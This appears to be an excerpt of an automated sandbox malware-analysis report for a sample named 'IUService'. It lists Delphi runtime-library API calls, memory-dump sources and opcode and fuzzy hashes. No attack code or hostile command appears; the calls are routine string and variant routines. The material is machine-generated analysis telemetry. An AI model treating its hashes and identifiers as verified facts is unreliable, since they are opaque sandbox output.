                                                                                                                                            • @System@Move$qqrpxvpvi.RTL120(?,?,?,?,50008CA1,?,?,?,500056AE,00000000), ref: 500092E0
                                                                                                                                            • @System@@LStrClr$qqrpv.RTL120(?,?,?,?,50008CA1,?,?,?,500056AE,00000000), ref: 500092E7
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            APIs
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002482B), ref: 500247B6
                                                                                                                                            • @Sysutils@NextCharIndex$qqrx20System@UnicodeStringi.RTL120(00000000,5002482B), ref: 500247E6
                                                                                                                                            • @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120(00000000,5002482B), ref: 500247F4
                                                                                                                                              • Part of subcall function 500089A4: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(50006B15,00000000,50006B69), ref: 500089B7
                                                                                                                                            • @System@@UStrLen$qqrx20System@UnicodeString.RTL120(00000000,5002482B), ref: 500247F9
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            APIs
                                                                                                                                            • @Variants@FindCustomVariantType$qqrxusrp27Variants@TCustomVariantType.RTL120(00000000,50035C10,?,?), ref: 50035B88
                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 50035B9A
                                                                                                                                            • @System@@UStrFromPWChar$qqrr20System@UnicodeStringpb.RTL120(?,?,?,00000000,50035C10,?,?), ref: 50035BC6
                                                                                                                                            • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,?,?,00000000,50035C10,?,?), ref: 50035BD8
                                                                                                                                            • @Variants@@VarClear$qqrr8TVarData.RTL120(50035BFA,00000000,50035C10,?,?), ref: 50035BED
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            APIs
                                                                                                                                            • @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,00000001,00000000,?,5000467F,?,?,00000000,?,500046F0,00000000,5000471D,?,?,?,00000000), ref: 5000A0EC
                                                                                                                                            • @System@@ReallocMem$qqrrpvi.RTL120(?,00000001,00000000,?,5000467F,?,?,00000000,?,500046F0,00000000,5000471D,?,?,?,00000000), ref: 5000A10D
                                                                                                                                            • @System@@LStrClr$qqrpv.RTL120(00000000,00000001,00000000,?,5000467F,?,?,00000000,?,500046F0,00000000,5000471D,?,?,?,00000000), ref: 5000A128
                                                                                                                                            • @System@@NewUnicodeString$qqri.RTL120(00000001,00000000,?,5000467F,?,?,00000000,?,500046F0,00000000,5000471D,?,?,?,00000000), ref: 5000A137
                                                                                                                                            • @System@Move$qqrpxvpvi.RTL120(00000001,00000000,?,5000467F,?,?,00000000,?,500046F0,00000000,5000471D,?,?,?,00000000), ref: 5000A151
                                                                                                                                            • @System@@LStrClr$qqrpv.RTL120(00000001,00000000,?,5000467F,?,?,00000000,?,500046F0,00000000,5000471D,?,?,?,00000000), ref: 5000A158
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@@$Clr$qqrpvSystem@Unicode$AnsiFromMem$qqrrpviMove$qqrpxvpviReallocStr$qqrr20StringString$qqriStringx27System@%T$us$i0$%
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 459293572-0
                                                                                                                                            • Opcode ID: 4cc0a279c1e311adab8d615449bc2667f6091f2205e3147081700d59042c7b26
                                                                                                                                            • Instruction ID: abed3fd4436abaaa380d7623d8e1add1c8c2b5ba31a90049ac681112dc4d52f4
                                                                                                                                            • Opcode Fuzzy Hash: 4cc0a279c1e311adab8d615449bc2667f6091f2205e3147081700d59042c7b26
                                                                                                                                            • Instruction Fuzzy Hash: 6A11E5327035704FBB049B6D9865799B3EAAFE6511BE48276E104CF31AEA70CC018381
                                                                                                                                            APIs
                                                                                                                                            • @System@@LStrAddRef$qqrpv.RTL120 ref: 5002E45A
                                                                                                                                            • @System@@InternalLStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120(00000000,5002E4EB), ref: 5002E487
                                                                                                                                              • Part of subcall function 500089C4: @System@@LStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120 ref: 500089C9
                                                                                                                                            • @System@@DynArraySetLength$qqrv.RTL120(?,00000000,5002E4EB), ref: 5002E4A5
                                                                                                                                            • @System@@InternalLStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120 ref: 5002E4C7
                                                                                                                                            • @System@Move$qqrpxvpvi.RTL120 ref: 5002E4D0
                                                                                                                                            • @System@@LStrClr$qqrpv.RTL120(5002E4F2), ref: 5002E4E5
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@@$System@$AnsiFromStr$qqrr27StringStringusSystem@%T$us$i0$%x20Unicode$Internal$ArrayClr$qqrpvLength$qqrvMove$qqrpxvpviRef$qqrpv
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1261208877-0
                                                                                                                                            • Opcode ID: 4549fb7da4154c2efe271ba38f2e99dccb4cd4c1b1852a6d14b1631e81dae761
                                                                                                                                            • Instruction ID: 3c343618ad32febf82e58c60c3e9db0a7bab7a8f9f77b7682e2089b40a4c880e
                                                                                                                                            • Opcode Fuzzy Hash: 4549fb7da4154c2efe271ba38f2e99dccb4cd4c1b1852a6d14b1631e81dae761
                                                                                                                                            • Instruction Fuzzy Hash: 53119E30702186EFEB14EFB8ED619AEB3F9EB48200BA04276E505D3651E674EE41C695
                                                                                                                                            APIs
                                                                                                                                            • @Sysutils@LastDelimiter$qqrx20System@UnicodeStringt1.RTL120(00000000,5001C6EA), ref: 5001C675
                                                                                                                                              • Part of subcall function 5001C3F4: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001C4C0,?,?,?,00000000), ref: 5001C430
                                                                                                                                              • Part of subcall function 5001C3F4: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,5001C4C0,?,?,?,00000000), ref: 5001C442
                                                                                                                                              • Part of subcall function 5001C3F4: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001C4C0,?,?,?,00000000), ref: 5001C466
                                                                                                                                              • Part of subcall function 5001C3F4: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001C4C0,?,?,?,00000000), ref: 5001C48D
                                                                                                                                              • Part of subcall function 5001C3F4: @Sysutils@StrScan$qqrpxbb.RTL120(00000000,5001C4C0,?,?,?,00000000), ref: 5001C49C
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001C6EA), ref: 5001C699
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @Sysutils@IsDelimiter$qqrx20System@UnicodeStringt1i.RTL120(00000000,5001C6EA), ref: 5001C6BA
                                                                                                                                            • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,5001C6EA), ref: 5001C6CF
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@Unicode$System@@$String$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$Internal$Sysutils@$Delimiter$qqrx20$Char$qqrx20Copy$qqrx20LastScan$qqrpxbbStringiiStringt1Stringt1i
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3602360137-0
                                                                                                                                            • Opcode ID: b7ecdf829e09be1f06fca1847c704ca9ba1f4837353794b0604a6312a969fd8d
                                                                                                                                            • Instruction ID: b57de0521b8727ab11f2a8e42c2c38b0e85b4303b6796bbee391bef3ecd85a0b
                                                                                                                                            • Opcode Fuzzy Hash: b7ecdf829e09be1f06fca1847c704ca9ba1f4837353794b0604a6312a969fd8d
                                                                                                                                            • Instruction Fuzzy Hash: 8E11A534611188EFDF04DFE8DD52DAD73F8EF99214B6056A6E400D3251DB74DE81D650
                                                                                                                                            APIs
                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 50035362
                                                                                                                                            • @Variants@VarResultCheck$qqrlusus.RTL120(?,?,00000000,500353FB,?,?,?), ref: 50035393
                                                                                                                                            • @System@@UStrFromPWChar$qqrr20System@UnicodeStringpb.RTL120(?,?,?,00000000,500353FB,?,?,?), ref: 500353A2
                                                                                                                                            • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,?,?,00000000,500353FB,?,?,?), ref: 500353B4
                                                                                                                                              • Part of subcall function 5000A464: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000A525), ref: 5000A4A0
                                                                                                                                              • Part of subcall function 5000A464: @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120(00000000,5000A525), ref: 5000A4F9
                                                                                                                                            • @System@@WStrFromUStr$qqrr17System@WideStringx20System@UnicodeString.RTL120(?,?,?,00000000,500353FB,?,?,?), ref: 500353BE
                                                                                                                                            • @Variants@@VarClear$qqrr8TVarData.RTL120(500353E0,00000000,500353FB,?,?,?), ref: 500353D3
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$System@@Unicode$From$String$AnsiCharChar$qqrr20Check$qqrlususClear$qqrr8Copy$qqrx20DataInitInternalLen$qqrr20ResultStr$qqrr17Str$qqrr20StringiiStringpbStringpbiStringx20Stringx27System@%T$us$i0$%VariantVariants@Variants@@Wide
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 586056455-0
                                                                                                                                            • Opcode ID: 91408789b8d8c02b34803f633b3ddfc0a8d103675c021eaf5b909a9d9fe4e244
                                                                                                                                            • Instruction ID: 6b062a9980747ec9e3f71d883036385996f80c363af4a58439cc275360a37b00
                                                                                                                                            • Opcode Fuzzy Hash: 91408789b8d8c02b34803f633b3ddfc0a8d103675c021eaf5b909a9d9fe4e244
                                                                                                                                            • Instruction Fuzzy Hash: BB11E070A00689AFDB11CBA8DC62AEF77BCEB49310F510632F600E3690D630990086A4
                                                                                                                                            APIs
                                                                                                                                            • @Sysutils@TEncoding@GetByteCount$qqrx20System@UnicodeString.RTL120(00000000,5002D979), ref: 5002D90D
                                                                                                                                              • Part of subcall function 5002D5A8: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002D61B), ref: 5002D5E1
                                                                                                                                              • Part of subcall function 5002D5A8: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,5002D61B), ref: 5002D5F4
                                                                                                                                            • @System@@DynArraySetLength$qqrv.RTL120(00000000,00000000,5002D979), ref: 5002D922
                                                                                                                                              • Part of subcall function 5000C0F4: @System@DynArraySetLength$qqrrpvpvipi.RTL120 ref: 5000C0F9
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120 ref: 5002D942
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @Sysutils@TEncoding@GetBytes$qqrx20System@UnicodeStringiir25System@%DynamicArray$tuc%i.RTL120(00000000,?,?), ref: 5002D95E
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$Unicode$StringSystem@@$System@%$AnsiFromStr$qqrr20Stringx27T$us$i0$%$ArrayEncoding@InternalSysutils@$Array$tuc%iByteBytes$qqrx20Char$qqrx20Count$qqrx20DynamicLength$qqrrpvpvipiLength$qqrvStringiir25
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3882313379-0
                                                                                                                                            APIs
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000AA77), ref: 5000AA22
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@LStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120(00000000,5000AA77), ref: 5000AA46
                                                                                                                                            • @System@@WriteLString$qqrr15System@TTextRecx27System@%AnsiStringT$us$i0$%i.RTL120(00000000,5000AA77), ref: 5000AA52
                                                                                                                                            • @System@@LStrClr$qqrpv.RTL120(5000AA7E), ref: 5000AA69
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@@$AnsiStringSystem@System@%$FromUnicode$Str$qqrr20Stringx27T$us$i0$%$Clr$qqrpvInternalRecx27Str$qqrr27String$qqrr15StringusT$us$i0$%iT$us$i0$%x20TextWrite
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1770171856-0
                                                                                                                                            APIs
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50021ACE), ref: 50021A70
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,50021ACE), ref: 50021A92
                                                                                                                                            • @Sysutils@FloatToTextFmt$qqrpbpxv20Sysutils@TFloatValuet1rx24Sysutils@TFormatSettings.RTL120(?,00000000,00000000,50021ACE), ref: 50021AA4
                                                                                                                                            • @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120(00000000,50021ACE), ref: 50021AB3
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@System@@Unicode$FromStringSysutils@$AnsiFloatStr$qqrr20Stringx27System@%T$us$i0$%$CharChar$qqrx20Fmt$qqrpbpxv20FormatInternalLen$qqrr20SettingsStringpbiTextValuet1rx24
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 450212489-0
                                                                                                                                            APIs
                                                                                                                                            • @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 5002F450
                                                                                                                                            • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5002F4C9), ref: 5002F46F
                                                                                                                                            • @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000000,00000000,5002F4C9), ref: 5002F486
                                                                                                                                            • @Sysutils@Format$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(00000000,00000000,5002F4C9), ref: 5002F49A
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrx20System@UnicodeString.RTL120(00000000,5002F4C9), ref: 5002F4A6
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$Unicode$String$System@@Sysutils@$Asg$qqrr20ClassClassoCreate$qqrp17Exception@$bctr$qqrx20Format$qqrx20LoadMetaRecxiString$qqrp20Stringpx14Stringx20
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 719264781-0
                                                                                                                                            APIs
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50021A22), ref: 500219C5
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,50021A22), ref: 500219E7
                                                                                                                                            • @Sysutils@FloatToTextFmt$qqrpbpxv20Sysutils@TFloatValuet1.RTL120(00000000,00000000,50021A22), ref: 500219F8
                                                                                                                                            • @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120(00000000,50021A22), ref: 50021A07
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@System@@Unicode$FromString$AnsiFloatStr$qqrr20Stringx27System@%Sysutils@T$us$i0$%$CharChar$qqrx20Fmt$qqrpbpxv20InternalLen$qqrr20StringpbiTextValuet1
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 220105677-0
                                                                                                                                            APIs
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50021B7A), ref: 50021B1D
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,50021B7A), ref: 50021B3F
                                                                                                                                            • @Sysutils@FloatToTextFmt$qqrpbpxv20Sysutils@TFloatValuet1.RTL120(00000000,00000000,50021B7A), ref: 50021B50
                                                                                                                                            • @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120(00000000,50021B7A), ref: 50021B5F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@System@@Unicode$FromString$AnsiFloatStr$qqrr20Stringx27System@%Sysutils@T$us$i0$%$CharChar$qqrx20Fmt$qqrpbpxv20InternalLen$qqrr20StringpbiTextValuet1
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 220105677-0
                                                                                                                                            APIs
                                                                                                                                            • @System@TObject@Free$qqrv.RTL120(?,?,5002EA37,00000000,5002EB85), ref: 5002728E
                                                                                                                                            • @System@ExceptObject$qqrv.RTL120(5002EA37,00000000,5002EB85), ref: 500272D0
                                                                                                                                            • @System@ExceptObject$qqrv.RTL120(5002EA37,00000000,5002EB85), ref: 500272D9
                                                                                                                                            • @System@@IsClass$qqrp14System@TObjectp17System@TMetaClass.RTL120(5002EA37,00000000,5002EB85), ref: 500272E4
                                                                                                                                            • @System@ExceptAddr$qqrv.RTL120(5002EA37,00000000,5002EB85), ref: 500272ED
                                                                                                                                            • @System@ExceptObject$qqrv.RTL120(00000000,5002EA37,00000000,5002EB85), ref: 500272F3
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$Except$Object$qqrv$Addr$qqrvClassClass$qqrp14Free$qqrvMetaObject@Objectp17System@@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3884317974-0
                                                                                                                                            APIs
                                                                                                                                            • @Variants@VarTypeAsText$qqrxus.RTL120(00000000,500307EF), ref: 5003078A
                                                                                                                                              • Part of subcall function 500391B0: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,500392C3,?,?,?,?,00000000,00000000,00000000,?,5003078F,00000000,500307EF), ref: 500391E7
                                                                                                                                              • Part of subcall function 500391B0: @System@@UStrCat3$qqrr20System@UnicodeStringx20System@UnicodeStringt2.RTL120(00000000,500392C3,?,?,?,?,00000000,00000000,00000000,?,5003078F,00000000,500307EF), ref: 50039290
                                                                                                                                              • Part of subcall function 500391B0: @System@@UStrCat3$qqrr20System@UnicodeStringx20System@UnicodeStringt2.RTL120(00000000,500392C3,?,?,?,?,00000000,00000000,00000000,?,5003078F,00000000,500307EF), ref: 500392A3
                                                                                                                                            • @Variants@VarTypeAsText$qqrxus.RTL120(00000000,500307EF), ref: 5003079E
                                                                                                                                              • Part of subcall function 500391B0: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,500392C3,?,?,?,?,00000000,00000000,00000000,?,5003078F,00000000,500307EF), ref: 500391FF
                                                                                                                                            • @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000001,?,00000000,500307EF), ref: 500307BB
                                                                                                                                              • Part of subcall function 5000D5D0: @System@FindResourceHInstance$qqrui.RTL120(00010000,?,00001000), ref: 5000D60F
                                                                                                                                              • Part of subcall function 5000D5D0: LoadStringW.USER32(00000000,00010000,?,00001000), ref: 5000D615
